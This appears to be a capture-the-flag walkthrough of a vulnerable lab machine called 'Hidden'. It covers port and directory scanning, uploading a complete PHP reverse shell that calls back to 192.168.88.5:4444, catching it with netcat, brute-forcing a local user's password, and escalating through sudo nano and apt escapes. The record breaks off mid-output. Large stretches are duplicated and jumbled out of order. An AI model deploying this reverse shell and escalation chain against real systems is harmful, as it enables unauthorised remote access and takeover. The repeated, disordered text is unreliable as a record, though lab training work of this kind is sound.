HIDDEN MACHINE
HIDDEN
┌──(root㉿kali)-[/home/kali]
└─# bash auto_deploy.sh hidden.tar
└─# bash auto_deploy.sh hidden.tar
Estamos desplegando la máquina vulnerable, espere un momento.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 80 (HTTP) was open.
Máquina desplegada, su dirección IP es --> 172.17.0.2
Presiona Ctrl+C cuando termines con la máquina para eliminarla
Once the host was identified, Nmap, a port scanning tool, was used to discover which services were running on the machine. The scan revealed port 80 (HTTP) was open.
┌──(root㉿kali)-[/home/kali]
└─# nmap -n -Pn -p- --min-rate 5000 172.17.0.2 -sV -vvv 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 11:59 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 11:59
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:59, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:59
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:59, 0.64s elapsed (65535 total ports)
Initiating Service scan at 11:59
Scanning 1 service on 172.17.0.2
Completed Service scan at 11:59, 6.02s elapsed (1 service on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:59
Completed NSE at 11:59, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:59
Completed NSE at 11:59, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-12-13 11:59:25 CET for 7s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.52
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: localhost
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.17 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
└─# nmap -n -Pn -p- --min-rate 5000 172.17.0.2 -sV -vvv 2>/dev/null
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-13 11:59 CET
NSE: Loaded 47 scripts for scanning.
Initiating ARP Ping Scan at 11:59
Scanning 172.17.0.2 [1 port]
Completed ARP Ping Scan at 11:59, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:59
Scanning 172.17.0.2 [65535 ports]
Discovered open port 80/tcp on 172.17.0.2
Completed SYN Stealth Scan at 11:59, 0.64s elapsed (65535 total ports)
Initiating Service scan at 11:59
Scanning 1 service on 172.17.0.2
Completed Service scan at 11:59, 6.02s elapsed (1 service on 1 host)
NSE: Script scanning 172.17.0.2.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 11:59
Completed NSE at 11:59, 0.01s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 11:59
Completed NSE at 11:59, 0.01s elapsed
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.0000040s latency).
Scanned at 2025-12-13 11:59:25 CET for 7s
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.52
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: Host: localhost
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.17 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
In addition, we must write hidden.lab /etc/hosts to obtain iformation about domain.
┌──(root㉿kali)-[/home/kali]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 hidden.lab
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Now, we should execute this toolkit to discover information over website as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://hidden.lab/" -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -x txt,php,pdf,bak,xml
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://hidden.lab/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: xml,txt,php,pdf,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/mail (Status: 301) [Size: 307] [--> http://hidden.lab/mail/]
/lib (Status: 301) [Size: 306] [--> http://hidden.lab/lib/]
/css (Status: 301) [Size: 306] [--> http://hidden.lab/css/]
Progress: 1226591 / 49772730 (2.46%)^C
In addition, we must write dev.hidden.lab /etc/hosts to obtain iformation about domain.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://hidden.lab/" -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -x txt,php,pdf,bak,xml
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://hidden.lab/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: xml,txt,php,pdf,bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/mail (Status: 301) [Size: 307] [--> http://hidden.lab/mail/]
/lib (Status: 301) [Size: 306] [--> http://hidden.lab/lib/]
/css (Status: 301) [Size: 306] [--> http://hidden.lab/css/]
Progress: 1226591 / 49772730 (2.46%)^C
In addition, we must write dev.hidden.lab /etc/hosts to obtain iformation about domain.
┌──(root㉿kali)-[/home/kali]
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 hidden.lab
172.17.0.2 dev.hidden.lab
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
└─# nano /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
172.17.0.2 hidden.lab
172.17.0.2 dev.hidden.lab
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
┌──(root㉿kali)-[/home/kali]
└─# ls
Descargas Escritorio Imágenes Plantillas reverse.phar
Documentos hidden.txt Música Público Vídeos
Now, we can create reverse_shell and try execute command as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# cat reverse.phar
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.88.5'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
└─# ls
Descargas Escritorio Imágenes Plantillas reverse.phar
Documentos hidden.txt Música Público Vídeos
Now, we can create reverse_shell and try execute command as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# cat reverse.phar
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. The author accepts no liability
// for damage caused by this tool. If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only. Users take full responsibility
// for any actions performed using this tool. If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.88.5'; // CHANGE THIS
$port = 4444; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
//
// Daemonise ourself if possible to avoid zombies later
//
// pcntl_fork is hardly ever available, but will allow us to daemonise
// our php process and avoid zombies. Worth a try...
if (function_exists('pcntl_fork')) {
// Fork and have the parent process exit
$pid = pcntl_fork();
if ($pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}
if ($pid) {
exit(0); // Parent exits
}
// Make the current process a session leader
// Will only succeed if we forked
if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}
$daemon = 1;
} else {
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
}
// Change to a safe directory
chdir("/");
// Remove any umask we inherited
umask(0);
//
// Do the reverse shell...
//
// Open reverse connection
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
printit("$errstr ($errno)");
exit(1);
}
// Spawn shell process
$descriptorspec = array(
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2 => array("pipe", "w") // stderr is a pipe that the child will write to
);
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}
// Set everything to non-blocking
// Reason: Occsionally reads will block, even though stream_select tells us they won't
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
// Check for end of TCP connection
if (feof($sock)) {
printit("ERROR: Shell connection terminated");
break;
}
// Check for end of STDOUT
if (feof($pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}
// Wait until a command is end down $sock, or some
// command output is available on STDOUT or STDERR
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send
// data to process's STDIN
if (in_array($sock, $read_a)) {
if ($debug) printit("SOCK READ");
$input = fread($sock, $chunk_size);
if ($debug) printit("SOCK: $input");
fwrite($pipes[0], $input);
}
// If we can read from the process's STDOUT
// send data down tcp connection
if (in_array($pipes[1], $read_a)) {
if ($debug) printit("STDOUT READ");
$input = fread($pipes[1], $chunk_size);
if ($debug) printit("STDOUT: $input");
fwrite($sock, $input);
}
// If we can read from the process's STDERR
// send data down tcp connection
if (in_array($pipes[2], $read_a)) {
if ($debug) printit("STDERR READ");
$input = fread($pipes[2], $chunk_size);
if ($debug) printit("STDERR: $input");
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
// Like print, but does nothing if we've daemonised ourself
// (I can't figure out how to redirect STDOUT like a proper daemon)
function printit ($string) {
if (!$daemon) {
print "$string\n";
}
}
?>
Now, we should execute this toolkit to discover information over website as you can see below.
┌──(root㉿kali)-[/home/kali]
└─# gobuster dir -u "http://dev.hidden.lab/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x txt,php,pdf,bak,xml
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dev.hidden.lab/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: pdf,bak,xml,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 318] [--> http://dev.hidden.lab/uploads/]
/upload.php (Status: 200) [Size: 74]
/server-status (Status: 403) [Size: 279]
Progress: 1323342 / 1323342 (100.00%)
===============================================================
Finished
===============================================================
└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.88.5] from hidden.lab [172.17.0.2] 52186
Linux 943f6acd83a3 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
11:22:46 up 38 min, 0 users, load average: 6.25, 3.75, 2.30
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@943f6acd83a3:/$ ^Z
zsh: suspended nc -lvp 4444
└─# gobuster dir -u "http://dev.hidden.lab/" -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x txt,php,pdf,bak,xml
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dev.hidden.lab/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.8
[+] Extensions: pdf,bak,xml,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads (Status: 301) [Size: 318] [--> http://dev.hidden.lab/uploads/]
/upload.php (Status: 200) [Size: 74]
/server-status (Status: 403) [Size: 279]
Progress: 1323342 / 1323342 (100.00%)
===============================================================
Finished
===============================================================
If we execute the file whose name's reverse.phar and before open port, we will get the access to vulnerable machine as you can see below.
┌──(root㉿kali)-[/home/kali]└─# nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.88.5] from hidden.lab [172.17.0.2] 52186
Linux 943f6acd83a3 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64 x86_64 x86_64 GNU/Linux
11:22:46 up 38 min, 0 users, load average: 6.25, 3.75, 2.30
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
www-data@943f6acd83a3:/$ ^Z
zsh: suspended nc -lvp 4444
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo;fg
[1] + continued nc -lvp 4444
reset xterm
www-data@943f6acd83a3:/$ export TERM=xterm
www-data@943f6acd83a3:/$ export SHELL=BASH
└─# stty raw -echo;fg
[1] + continued nc -lvp 4444
reset xterm
www-data@943f6acd83a3:/$ export TERM=xterm
www-data@943f6acd83a3:/$ export SHELL=BASH
Now, let's go to discover as we can be able to become root user.
www-data@943f6acd83a3:/$ find / -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/passwd
/usr/bin/sudo
www-data@943f6acd83a3:/$ cd /home/
www-data@943f6acd83a3:/home$ ls
bobby cafetero john
www-data@943f6acd83a3:/home$ cd bobby/
bash: cd: bobby/: Permission denied
www-data@943f6acd83a3:/home$ cd cafetero/
bash: cd: cafetero/: Permission denied
www-data@943f6acd83a3:/home$ cd john/
bash: cd: john/: Permission denied
www-data@943f6acd83a3:/home$
We have discovered this method which we can execute this toolkit and if the password is leak, we will get it as you can see below the toolkit which is Sudo_BruteForce.
www-data@943f6acd83a3:/home$ ls
bobby cafetero john
www-data@943f6acd83a3:/home$ cd bobby/
bash: cd: bobby/: Permission denied
www-data@943f6acd83a3:/home$ cd cafetero/
bash: cd: cafetero/: Permission denied
www-data@943f6acd83a3:/home$ cd john/
bash: cd: john/: Permission denied
www-data@943f6acd83a3:/home$
We have discovered this method which we can execute this toolkit and if the password is leak, we will get it as you can see below the toolkit which is Sudo_BruteForce.
www-data@943f6acd83a3:/home$ ls
bobby cafetero john
www-data@943f6acd83a3:/home$ cd ..
www-data@943f6acd83a3:/$ ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
www-data@943f6acd83a3:/$ cd /etc/
www-data@943f6acd83a3:/etc$ ls
adduser.conf host.conf nanorc security
alternatives hostname netconfig selinux
apache2 hosts networks services
apt init.d nsswitch.conf shadow
bash.bashrc issue opt shadow-
bindresvport.blacklist issue.net os-release shells
ca-certificates kernel pam.conf skel
ca-certificates.conf ld.so.cache pam.d ssl
cloud ld.so.conf passwd subgid
cron.d ld.so.conf.d passwd- subgid-
cron.daily ldap perl subuid
debconf.conf legal php subuid-
debian_version libaudit.conf profile sudo.conf
default localtime profile.d sudo_logsrvd.conf
deluser.conf logcheck protocols sudoers
dpkg login.defs rc0.d sudoers.d
e2scrub.conf logrotate.d rc1.d sysctl.conf
environment lsb-release rc2.d sysctl.d
ethertypes machine-id rc3.d systemd
fstab magic rc4.d terminfo
gai.conf magic.mime rc5.d timezone
group mailcap rc6.d ucf.conf
group- mailcap.order rcS.d ufw
gshadow mime.types resolv.conf update-motd.d
gshadow- mke2fs.conf rmt xattr.conf
gss mtab rpc
www-data@943f6acd83a3:/etc$ cd /dev/
www-data@943f6acd83a3:/dev$ ls
core full null pts shm stdin tty zero
fd mqueue ptmx random stderr stdout urandom
www-data@943f6acd83a3:/dev$ cd ..
www-data@943f6acd83a3:/$ ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
www-data@943f6acd83a3:/$ cd /var/www/dev.hidden.lab/
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ ls
index.html upload.php uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ cd upload
bash: cd: upload: No such file or directory
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ ls
index.html upload.php uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ cd uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ ls
bruteforce.sh reverse.phar
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ ls -la
total 24
drwxrwxrwx 1 root root 4096 Dec 13 11:32 .
drwxr-xr-x 1 root root 4096 Apr 16 2024 ..
-rw-r--r-- 1 www-data www-data 1600 Dec 13 11:32 bruteforce.sh
-rw-r--r-- 1 www-data www-data 5493 Dec 13 11:18 reverse.phar
bobby cafetero john
www-data@943f6acd83a3:/home$ cd ..
www-data@943f6acd83a3:/$ ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
www-data@943f6acd83a3:/$ cd /etc/
www-data@943f6acd83a3:/etc$ ls
adduser.conf host.conf nanorc security
alternatives hostname netconfig selinux
apache2 hosts networks services
apt init.d nsswitch.conf shadow
bash.bashrc issue opt shadow-
bindresvport.blacklist issue.net os-release shells
ca-certificates kernel pam.conf skel
ca-certificates.conf ld.so.cache pam.d ssl
cloud ld.so.conf passwd subgid
cron.d ld.so.conf.d passwd- subgid-
cron.daily ldap perl subuid
debconf.conf legal php subuid-
debian_version libaudit.conf profile sudo.conf
default localtime profile.d sudo_logsrvd.conf
deluser.conf logcheck protocols sudoers
dpkg login.defs rc0.d sudoers.d
e2scrub.conf logrotate.d rc1.d sysctl.conf
environment lsb-release rc2.d sysctl.d
ethertypes machine-id rc3.d systemd
fstab magic rc4.d terminfo
gai.conf magic.mime rc5.d timezone
group mailcap rc6.d ucf.conf
group- mailcap.order rcS.d ufw
gshadow mime.types resolv.conf update-motd.d
gshadow- mke2fs.conf rmt xattr.conf
gss mtab rpc
www-data@943f6acd83a3:/etc$ cd /dev/
www-data@943f6acd83a3:/dev$ ls
core full null pts shm stdin tty zero
fd mqueue ptmx random stderr stdout urandom
www-data@943f6acd83a3:/dev$ cd ..
www-data@943f6acd83a3:/$ ls
bin dev home lib32 libx32 mnt proc run srv tmp var
boot etc lib lib64 media opt root sbin sys usr
www-data@943f6acd83a3:/$ cd /var/www/dev.hidden.lab/
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ ls
index.html upload.php uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ cd upload
bash: cd: upload: No such file or directory
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ ls
index.html upload.php uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab$ cd uploads
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ ls
bruteforce.sh reverse.phar
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
total 24
drwxrwxrwx 1 root root 4096 Dec 13 11:32 .
drwxr-xr-x 1 root root 4096 Apr 16 2024 ..
-rw-r--r-- 1 www-data www-data 1600 Dec 13 11:32 bruteforce.sh
-rw-r--r-- 1 www-data www-data 5493 Dec 13 11:18 reverse.phar
Now, let's go to execute the command to execute the script as you can see below.
www data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ chmod +x bruteforce.sh
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ ls
10k-most-common.txt bruteforce.sh prpe reverse.phar
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ ls
10k-most-common.txt bruteforce.sh prpe reverse.phar
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
Gotha! the password has been discovered which is 123123, then when we will execute su cafetero password and bash -p we will be the cafetero user as you can see below.
Contraseña encontrada para el usuario cafetero: 123123
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ su cafetero
Password:
$ whoami
cafetero
$ bash -p
cafetero@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
cafetero@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ sudo -l
Matching Defaults entries for cafetero on 943f6acd83a3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
Now, we are going to search in gtobins nano as you can see below.
User cafetero may run the following commands on 943f6acd83a3:
(john) NOPASSWD: /usr/bin/nano
www-data@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ su cafetero
Password:
$ whoami
cafetero
$ bash -p
cafetero@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
cafetero@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ sudo -l
Matching Defaults entries for cafetero on 943f6acd83a3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
Now, we are going to search in gtobins nano as you can see below.
User cafetero may run the following commands on 943f6acd83a3:
(john) NOPASSWD: /usr/bin/nano
cafetero@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
sudo -u "john" /usr/bin/nano
Command to execute: reset; sh 1>&0 2>&0
$ whoami
john
$ bash -p
sudo -u "john" /usr/bin/nano
Command to execute: reset; sh 1>&0 2>&0
$ whoami
john
$ bash -p
Now, we are going to search apt in gtobins as you can see below.
john@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
sudo -u "bobby" /usr/bin/apt changelog apt
apt (2.4.12) jammy; urgency=medium
* Restore ?garbage by calling MarkAndSweep before parsing (LP: #1995790)
* For phasing, check if current version is a security update, not just previou
s ones
(LP: #2051181)
-- Julian Andres Klode <juliank@ubuntu.com> Tue, 13 Feb 2024 16:39:04 +0100
apt (2.4.11) jammy; urgency=medium
* Backport archive snapshot integration as of 2.7.3 (LP: #2038453)
-- Julian Andres Klode <juliank@ubuntu.com> Fri, 06 Oct 2023 10:53:53 +0200
apt (2.4.10) jammy; urgency=medium
* dist-upgrade: Revert phased updates using keeps only (LP: #2025462)
* Do not mark updates for install that are still phasing (same bug)
* Compare SHA256 to check if versions are really the same (Closes: #931175)
(LP: #2029268)
-- Julian Andres Klode <juliank@ubuntu.com> Wed, 02 Aug 2023 15:15:58 +0200
!/bin/bash
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ whoami
bobby
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$
bobby@943f6acd83a3:/var/www/dev.hidden.lab/uploads$ sudo -l
Matching Defaults entries for bobby on 943f6acd83a3:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
